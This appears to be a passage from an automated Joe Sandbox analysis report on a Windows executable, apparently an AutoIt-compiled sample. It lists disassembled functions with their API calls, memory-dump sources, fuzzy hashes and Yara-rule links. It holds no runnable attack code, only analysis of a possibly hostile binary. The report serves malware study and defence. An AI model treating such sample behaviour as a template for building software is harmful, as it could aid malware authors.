Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00713B0F,SwapMouseButtons,00000004,?), ref: 00713B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00713B0F,SwapMouseButtons,00000004,?), ref: 00713B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00713B0F,SwapMouseButtons,00000004,?), ref: 00713B83

Strings

Control Panel\Mouse, xrefs: 00713B3E

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 6c5452fc065eb7a4e93cd530fb7913faf89614a159613aa6855c33ed05ac17ca
Instruction ID: 0078ff801ee003af4fd72b8af98ec4cb76e4bac48958a350de0f80346895b6ad
Opcode Fuzzy Hash: 6c5452fc065eb7a4e93cd530fb7913faf89614a159613aa6855c33ed05ac17ca
Instruction Fuzzy Hash: A41127F5614208FFDB218FA9DC85AEFBBB8EF45744B10846AA805D7150E2359E809BA4

Function 00713923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007533A2

Part of subcall function 00716B57: _wcslen.LIBCMT ref: 00716B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00713A04

Strings

Line: , xrefs: 007533EB

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 8b1e5699bf26656873eddd638e0d5355bab38f61e4982ec483e2a58f6e0d7caa
Instruction ID: bd7a0b599e1d0cff4a3815d3206242eb45fa1ec06cc4b7e8de1586e7fe723869
Opcode Fuzzy Hash: 8b1e5699bf26656873eddd638e0d5355bab38f61e4982ec483e2a58f6e0d7caa
Instruction Fuzzy Hash: CC31C571409344AAD721EB18DC4ABEBB7ECAF44714F00451AF599930D1DB7CA689C7C6

Function 00712DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00752C8C

Part of subcall function 00713AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00713A97,?,?,00712E7F,?,?,?,00000000), ref: 00713AC2

Part of subcall function 00712DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00712DC4

Strings

`e}, xrefs: 00752C85
X, xrefs: 00752C5A

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`e}
API String ID: 779396738-2683834941
Opcode ID: 0164105ea38a0198ec167846dc3ec67a85c8c89ed149bc93c7e9c5bf856b026e
Instruction ID: 5260650d06b0f85b87e6d1abacea3563a0e0ab950da70406ffa2e126c88eb735
Opcode Fuzzy Hash: 0164105ea38a0198ec167846dc3ec67a85c8c89ed149bc93c7e9c5bf856b026e
Instruction Fuzzy Hash: A7219671A00298DBDB41DF98D8497EE7BF89F49705F10805AE405A7282DBBC5A8D8F61

Function 0072FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00730668

Part of subcall function 007332A4: RaiseException.KERNEL32(?,?,?,0073068A,?,007E1444,?,?,?,?,?,?,0073068A,00711129,007D8738,00711129), ref: 00733304

__CxxThrowException@8.LIBVCRUNTIME ref: 00730685

Strings

Unknown exception, xrefs: 00730692

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: cb683327ea0a61869f7e0dc415cae4945d90b9086b7683a7373a17f16194cb6a
Instruction ID: 3738ef3aa7bc16a0498bd7a634489059d13cb8c70dca95bfeb5e720267212109
Opcode Fuzzy Hash: cb683327ea0a61869f7e0dc415cae4945d90b9086b7683a7373a17f16194cb6a
Instruction Fuzzy Hash: D7F0C234A0020DF7DB04B6A4E86AD9E777C6E40320F604532F824D6597EF79EA65C5C1

Function 013207F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0132083D
ExitProcess.KERNEL32(00000000), ref: 0132085C

Strings

D, xrefs: 01320809

Memory Dump Source

Source File: 00000000.00000002.2016132862.000000000131F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0131F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_131f000_9876567899.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: 8ff53cc741f04adc946779470c72492426263afa614c789403871e93d35377f7
Instruction ID: 823442d85f4af858db9b492d279f69f4475d725b97bb31a3a3b17a834145c561
Opcode Fuzzy Hash: 8ff53cc741f04adc946779470c72492426263afa614c789403871e93d35377f7
Instruction Fuzzy Hash: ACF0FF7294025CABDB60EFE4CD49FEE777CBF08705F408518FB1A9A180DA7496088BA1

Function 00797F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 007982F5
TerminateProcess.KERNEL32(00000000), ref: 007982FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 007984DD

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 44adabc1d2336dc97174abbb5915219ce4c2438cfd34969e4da5d122497a06b5
Instruction ID: 5fa6b82696a53ee28fba476b4ad9c778bb96f18bcebbb22f52d293ba081f22d6
Opcode Fuzzy Hash: 44adabc1d2336dc97174abbb5915219ce4c2438cfd34969e4da5d122497a06b5
Instruction Fuzzy Hash: 6D129B71A08341DFCB54DF28D484B6ABBE5BF85314F04895DE8898B292CB39ED45CF92

Function 007110F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00711BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00711BF4
Part of subcall function 00711BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00711BFC
Part of subcall function 00711BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00711C07
Part of subcall function 00711BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00711C12
Part of subcall function 00711BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00711C1A
Part of subcall function 00711BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00711C22

Part of subcall function 00711B4A: RegisterWindowMessageW.USER32(00000004,?,007112C4), ref: 00711BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0071136A
OleInitialize.OLE32 ref: 00711388
CloseHandle.KERNEL32(00000000,00000000), ref: 007524AB

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 3d12395fc684213075d0232744f24e3bb8755de42ccc99fdd5e1b563f1f2dc13
Instruction ID: 55fc5a7b85a390aed54c42a564f7ea5afc2d3248a32d7752b327b437c4c949aa
Opcode Fuzzy Hash: 3d12395fc684213075d0232744f24e3bb8755de42ccc99fdd5e1b563f1f2dc13
Instruction Fuzzy Hash: 0F717EB49033C09EC785DF69A9876993AE0BB8D3543D4C22A911ACF3A1EB3C5491CF59

Function 007486AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,007485CC,?,007D8CC8,0000000C), ref: 00748704
GetLastError.KERNEL32(?,007485CC,?,007D8CC8,0000000C), ref: 0074870E
__dosmaperr.LIBCMT ref: 00748739

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: d9edd168f9b517d021ee5c9dc2a02ff6c2b364a2f9a3044e4896393e8738309d
Instruction ID: 220c78d434cec0b5602b0aaeef549645116e905eb5a9ee5840d40c0f354895e9
Opcode Fuzzy Hash: d9edd168f9b517d021ee5c9dc2a02ff6c2b364a2f9a3044e4896393e8738309d
Instruction Fuzzy Hash: 49018933A0526467D6E66734A889B7E27494B82B78F3A0119F818CB1D3DFACCC818193

Function 00721310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 007217F6

Strings

CALL, xrefs: 007217C6

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: a03a8eb9a67e9b17a0a08ee0e77362c3fc4ec8bbbd6b4bb69c69a577e89bdf24
Instruction ID: 95f39f7418a0ebf6ff2b716d1e519465e902f3b8bf85a8ee810a38db45513dec
Opcode Fuzzy Hash: a03a8eb9a67e9b17a0a08ee0e77362c3fc4ec8bbbd6b4bb69c69a577e89bdf24
Instruction Fuzzy Hash: 6622CB70608351DFC714DF14D484A2ABBF1BF99314FA4896DF8868B3A2D739E851CB82

Function 00713837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00713908

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: bb2e8a51d09c54fde73ec256e975dbac0d1bbbe60416a4474f43dac76ab44ed5
Instruction ID: 66e2e1dfc3589fba36e3874dcc514136f424ccd4df000746995c296624b9695f
Opcode Fuzzy Hash: bb2e8a51d09c54fde73ec256e975dbac0d1bbbe60416a4474f43dac76ab44ed5
Instruction Fuzzy Hash: B531D270505300DFD721DF28D8857D7BBE8FB49708F00092EF99997290E7B9AA84CB56

Function 00715745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0071949C,?,00008000), ref: 00715773
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0071949C,?,00008000), ref: 00754052

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8ab1a88af12cd141f86c614defc46890cd9d864d1cf6633103124f2bd4d6b7e3
Instruction ID: 994af5014ba873a131a695176b8c2ad80d794f4ca3cd6b6d33f13572ba78568d
Opcode Fuzzy Hash: 8ab1a88af12cd141f86c614defc46890cd9d864d1cf6633103124f2bd4d6b7e3
Instruction Fuzzy Hash: B7012D31245225F6E3354A2ADC0EFE77F98AF427B5F148210BA9C5A1E08AB85894CB94

Function 0079709C Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: c3ec61489e16f6f8848b82b2a03c199ab3d13f0d50b224002c3977b06fc4d931
Instruction ID: bc4eb56eae64cdbcd9e986cc6a3eaeba0eb68a76cfcb106159fdbd67db0fed34
Opcode Fuzzy Hash: c3ec61489e16f6f8848b82b2a03c199ab3d13f0d50b224002c3977b06fc4d931
Instruction Fuzzy Hash: 9FD16C34A1424AEFCF18EF98D8859EDBBB5FF48310F144059E915AB291EB34AD81CF90

Function 01320868 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

APIs

Part of subcall function 013200D8: GetFileAttributesW.KERNELBASE(?), ref: 013200E3

CreateDirectoryW.KERNELBASE(?,00000000), ref: 013209D6

Memory Dump Source

Source File: 00000000.00000002.2016132862.000000000131F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0131F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_131f000_9876567899.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: d7ef5e1e275b5b1acd1fbce6dc0c3c1079b6bc16d6b36970d56ed38ba3add44a
Instruction ID: edc4e2904ca13d85826a66e3c4b07dbe27d593459180a9394383244163995f8a
Opcode Fuzzy Hash: d7ef5e1e275b5b1acd1fbce6dc0c3c1079b6bc16d6b36970d56ed38ba3add44a
Instruction Fuzzy Hash: 0161A331A1021997EF14EFA4C844BEF733AEF58700F004569F60DE7290EB359A49CBA5

Function 0072FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0072FD1F

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 512c81888d1c43e73297c7c26cd811637a5b892d6be384194f2a4f5a21751743
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 6E31E174A001199BD718DF69E4A0969FBB2FF49300B2486B5E80ACB756D735EDC1CBD0

Function 00714ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00714E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00714EDD,?,007E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00714E9C
Part of subcall function 00714E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00714EAE
Part of subcall function 00714E90: FreeLibrary.KERNEL32(00000000,?,?,00714EDD,?,007E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00714EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,007E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00714EFD

Part of subcall function 00714E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00753CDE,?,007E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00714E62
Part of subcall function 00714E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00714E74
Part of subcall function 00714E59: FreeLibrary.KERNEL32(00000000,?,?,00753CDE,?,007E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00714E87

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 8fe67c9b368e29d9519de14325d62151ee7c813283ac5717759b8990d84b2c24
Instruction ID: 76af7969f5a0577337adbcd0faad85bf62a73e91abf4df71a3cd64f4a0ee156a
Opcode Fuzzy Hash: 8fe67c9b368e29d9519de14325d62151ee7c813283ac5717759b8990d84b2c24
Instruction Fuzzy Hash: B011EB31600205EBDF15BB68DC0AFED77A59F80711F10441DF542A62D1DE799A85D750

Function 00748402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00748440

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 53b033ee531f3662b986c7b0c6d20b4bb0eb6f716091fe4cba2d80b76bd444c7
Instruction ID: f30460c853e3dc0e3e3513be94dcb57c2beb8d9763100a9eb2d3614fc12aec4b
Opcode Fuzzy Hash: 53b033ee531f3662b986c7b0c6d20b4bb0eb6f716091fe4cba2d80b76bd444c7
Instruction Fuzzy Hash: 781118B590410EAFCB05DF58E94599E7BF5EF48314F144059FC08AB312DB35EA11CBA5

Function 00745000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00744C7D: RtlAllocateHeap.NTDLL(00000008,00711129,00000000,?,00742E29,00000001,00000364,?,?,?,0073F2DE,00743863,007E1444,?,0072FDF5,?), ref: 00744CBE

_free.LIBCMT ref: 0074506C

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: 51c1f12f1c16426740089c69f655a24486b61a07381b58eee4094772cea8e08e
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: 16014976204705ABE3318F69D885A9AFBEDFB89370F65061DF184932C1EB34A805C7B4

Function 0073E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: 1a243268a1c68ddd28128b956a7ceb449ee541cce34ddaf88e3c17b924417484
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: 88F0CD32511A14D7F7313A659C0EB5B37989F52375F100719F525931D3DB7CE80285A6

Function 00719CB3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00719CBD

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 5f7a7664f17da1d19d8954cca8c3b176727d96928ac8342286fd15acdcdd70ab
Instruction ID: c57f26364773126c33c120c63d90cacebcfa8d28518bb6656429fd8a0b5b22ca
